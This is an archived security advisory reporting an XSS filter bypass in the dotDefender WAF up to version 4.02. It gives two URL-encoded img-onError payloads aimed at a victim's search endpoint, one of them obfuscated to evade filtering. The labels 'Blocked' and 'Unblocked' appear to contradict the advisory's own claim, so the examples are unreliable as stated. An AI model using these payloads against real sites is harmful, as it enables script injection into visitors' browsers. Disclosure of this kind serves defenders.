AOH :: HP Unsorted X :: B1A-1441.HTM

XSS holes dotDefender



XSS holes dotDefender
XSS holes dotDefender



dotDefender is prone to a XSS because it doesn't satinate the input vars 
correctly. Injecting obfusctated JavaScript code based on references vars 
assignment, the dotDefender WAF is vulnerable.

Class: Input Validation Error
Remote: Yes
Credit: David K. (SH4V)
Vulnerable: till 4.02

Exploit:

 //POST

 //GET

EXAMPLES:

Blocked:
[victim]/search?q=%3Cimg%20src=%22WTF%22%20onError=%22{var%20{3:s,2:h,5:a,0:v,4:n,1:e}
=%27earltv%27}[self][0][v%2Ba%2Be%2Bs]%28e%2Bs%2Bv%2Bh%2Bn%29%28/0wn3d/.source%
29%22%20/%3E

Unblocked:
[victim]/search?q=%3Cimg%20src=%22WTF%22%20onError=alert(/0wn3d/.source)%20/%3E

More information here:

http://n3t-datagrams.net/docs/?/=21 

Regards,

David K.

The entire AOH site is optimized to look best in Firefox® 3 on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH
We do not send spam. If you have received spam bearing an artofhacking.com email address, please forward it with full headers to abuse@artofhacking.com.